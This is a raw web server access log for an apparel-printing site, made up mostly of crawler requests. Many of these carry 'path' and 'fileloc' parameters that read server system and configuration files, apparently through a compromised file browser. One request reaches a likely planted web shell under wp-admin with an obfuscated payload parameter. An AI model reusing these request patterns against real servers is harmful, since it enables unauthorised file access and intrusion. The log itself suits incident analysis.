20.171.207.136 - - [25/Oct/2025:12:18:08 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/kimai/images HTTP/2.0" 200 2658 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:08 +0000] "GET /products/48484896.html?path=%2F HTTP/2.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:08 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fvar%2Fsoftaculous%2Fpmwiki%2Fphp56%2Fupgrade.php&path=%2F%2Fvar%2Fsoftaculous%2Fpmwiki%2Fphp56 HTTP/2.0" 200 4835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.83.10.183 - - [25/Oct/2025:12:18:08 +0000] "GET /screen-printing/?path=//usr/lib/.build-id/5e HTTP/1.1" 200 28484 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:08 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Flib64%2Fpkgconfig%2Fpanel.pc&path=%2F%2Flib64%2Fpkgconfig HTTP/2.0" 200 2449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:09 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-29015226.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:09 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-2357578.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:09 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29254505&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:10 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-14713066.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:10 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fvar%2Fsoftaculous%2Fvision%2Fphp71%2Fupgrade.php&path=%2F%2Fvar%2Fsoftaculous%2Fvision%2Fphp71 HTTP/2.0" 200 6011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:10 +0000] "GET /product/elgin-wildcat-logo-spirit-wear-t-shirt?fileloc=%2F%2Fetc%2Flibibverbs.d%2Fmlx4.driver&path=%2F%2Fetc%2Flibibverbs.d HTTP/2.0" 200 2243 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:11 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Flib64%2Fsecurity%2Fpam_warn.so&path=%2F%2Flib64%2Fsecurity HTTP/2.0" 200 5356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:11 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-11439442.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2441 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:11 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/clicshop/images HTTP/2.0" 200 2663 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:11 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30191314&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2441 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
184.154.14.66 - - [25/Oct/2025:12:13:12 +0000] "GET /wp-admin/css/colors/ocean/ocean/index.php?ARRAY=7o2230223n313736313339373939322p2231223n22687474703n5p2s5p2s7n7336313276313361732r636p6s77652r6172745p2s3s6p633q7068705s636s64655s6n6326743q313736313339343339322q6332373866616161656138346235663436643032633731313566326630363662222p2232223n226366316335656161353133653330303731613361613538336136613135323331222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33392q35342q37302q37322q38312q3238227q HTTP/1.1" 504 44736 "-" "-"
216.73.216.191 - - [25/Oct/2025:12:18:12 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29403819&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:12 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29155331&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:11 +0000] "GET /product/img/dlf_fig3.png?fileloc=%2F%2Fscripts%2Frestartsrv_clamd&path=%2F%2Fscripts HTTP/2.0" 200 1487374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:12 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29831789&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2429 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.210.155.69 - - [25/Oct/2025:12:18:13 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?path=//sys/class/mem/null/subsystem/zero/subsystem/null/subsystem/full HTTP/1.1" 200 17919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:13 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Foptions.php&path=%2F%2Fproc%2Fself%2Fcwd HTTP/2.0" 200 3186 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:13 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29932344&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:13 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30072331&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:14 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-18023860.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.155.236 - - [25/Oct/2025:12:18:14 +0000] "GET /wolf/intend117/lp2ho-25416/ HTTP/1.1" 200 81419 "https://www.rockyroadprinting.net/sitemap638.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.191 - - [25/Oct/2025:12:18:14 +0000] "GET /my-account/?fileloc=%2F%2Fproc%2F2150691%2Fwchan&path=%2F%2Fproc%2F2150691 HTTP/2.0" 200 2242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:14 +0000] "GET /product/elgin-wildcat-logo-spirit-wear-t-shirt?fileloc=%2F%2Fetc%2Fyum.repos.d%2Falmalinux.repo&path=%2F%2Fetc%2Fyum.repos.d HTTP/2.0" 200 2561 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:14 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/freshrss/images HTTP/2.0" 200 2661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.28.133.214 - - [25/Oct/2025:12:18:14 +0000] "GET /screen-printing/?fileloc=//proc/self/root/scripts/secureit&path=//proc/self/root/scripts HTTP/1.1" 200 17583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:14 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fvar%2Fsoftaculous%2Fkanboard%2Fphp82%2Fupgrade.php&path=%2F%2Fvar%2Fsoftaculous%2Fkanboard%2Fphp82 HTTP/2.0" 200 4693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:15 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29693767&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:15 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fvar%2Fsoftaculous%2Fmaian%2Fphp82%2Fupgrade.php&path=%2F%2Fvar%2Fsoftaculous%2Fmaian%2Fphp82 HTTP/2.0" 200 6539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:15 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Flib%2F.build-id%2Fb1%2Fd209d818e88db0d2b548706296f552310272bf&path=%2F%2Flib%2F.build-id%2Fb1 HTTP/2.0" 200 19063 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:16 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29868996&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.131 - - [25/Oct/2025:12:18:16 +0000] "GET /curriculum/grave56/1es8q-14793/ HTTP/1.1" 200 24137 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.191 - - [25/Oct/2025:12:18:16 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Flib%2F.build-id%2F82%2F93b94bd7b066a3885970853f64ac670e6ae750&path=%2F%2Flib%2F.build-id%2F82 HTTP/2.0" 200 12040 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:16 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29823929&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2433 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:17 +0000] "GET /product/img/dlf_fig3.png?fileloc=%2F%2Fscripts%2Frestartsrv_syslogd&path=%2F%2Fscripts HTTP/2.0" 200 3144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:17 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Flib%2F.build-id%2F4d%2Fd9a0420078b5adff246e984e8a6a0790e8af66&path=%2F%2Flib%2F.build-id%2F4d HTTP/2.0" 200 14187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:17 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fvar%2Fsoftaculous%2Fblesta%2Fphp82%2Fimport.php&path=%2F%2Fvar%2Fsoftaculous%2Fblesta%2Fphp82 HTTP/2.0" 200 13893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:17 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/nukeviet HTTP/2.0" 200 3193 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:18 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29525037&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:18 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-3180209.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:18 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fproc%2Fsys%2Fvm%2Fextfrag_threshold&path=%2F%2Fproc%2Fsys%2Fvm HTTP/2.0" 200 2245 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:18 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fproc%2F3%2Froot%2Fsbin%2Fchpasswd&path=%2F%2Fproc%2F3%2Froot%2Fsbin HTTP/2.0" 200 22588 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:19 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-23738660.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:19 +0000] "GET /product/img/l_arrow.png?fileloc=%2F%2Flib64%2Flibsasl2.so&path=%2F%2Flib64 HTTP/2.0" 200 50463 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:19 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30184646&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.156.248.117 - - [25/Oct/2025:12:18:19 +0000] "GET /screen-printing-minimum-orders-bulk-benefits/?fileloc=//sys/devices/virtual/net/lo/queues/tx-0/tx_maxrate&path=//sys/devices/virtual/net/lo/queues/tx-0 HTTP/1.1" 200 12594 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:20 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-14343551.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:20 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29781273&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:20 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30081837&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:20 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/cmssimple/php71 HTTP/2.0" 200 2723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:21 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29377513&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:21 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29277823&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:21 +0000] "GET /product/elgin-wildcat-logo-spirit-wear-t-shirt?fileloc=%2F%2Fbin%2Fgrub2-script-check&path=%2F%2Fbin HTTP/2.0" 200 85133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:22 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?path=%2F%2Fsys%2Fmodule%2Fvzdev%2Fholders%2Fvzmon HTTP/2.0" 200 2547 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:22 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29857014&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:22 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fvar%2Fsoftaculous%2Fwp64%2Fedit.php&path=%2F%2Fvar%2Fsoftaculous%2Fwp64 HTTP/2.0" 200 9333 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:23 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fvar%2Fsoftaculous%2Fmaian%2Fphp81%2Fedit.php&path=%2F%2Fvar%2Fsoftaculous%2Fmaian%2Fphp81 HTTP/2.0" 200 6010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:23 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fproc%2F2291195%2Ftask%2F2291195%2Fnet%2Fnf_conntrack_expect&path=%2F%2Fproc%2F2291195%2Ftask%2F2291195%2Fnet HTTP/2.0" 200 2261 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:23 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29567151&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:23 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29491839&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2429 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.3.104.214 - - [25/Oct/2025:12:18:24 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?path=//proc/self/root/opt/cpanel/ea-php80/root/var/adm HTTP/1.1" 200 13105 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.136 - - [25/Oct/2025:12:18:24 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/cmssimple/php53 HTTP/2.0" 200 2722 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:24 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29831029&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:24 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29797908&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:24 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29492835&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:25 +0000] "GET /product/img/l_arrow.png?fileloc=%2F%2Flib64%2Flibmetalink.so.3.1.0&path=%2F%2Flib64 HTTP/2.0" 200 20513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:25 +0000] "GET /products/34911520.html?path=%2F HTTP/2.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:25 +0000] "GET /product/img/dlf_table5.png?fileloc=%2F%2Flib64%2Flibpcre32.so.0&path=%2F%2Flib64 HTTP/2.0" 200 137957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:26 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fvar%2Fsoftaculous%2Fhesk%2Fphp71%2Fedit.php&path=%2F%2Fvar%2Fsoftaculous%2Fhesk%2Fphp71 HTTP/2.0" 200 6357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:26 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fproc%2F477%2Fnet%2Frt6_stats&path=%2F%2Fproc%2F477%2Fnet HTTP/2.0" 200 2254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:26 +0000] "GET /product/img/dlf_table5.png?fileloc=%2F%2Flib64%2Flibk5crypto.so&path=%2F%2Flib64 HTTP/2.0" 200 34900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
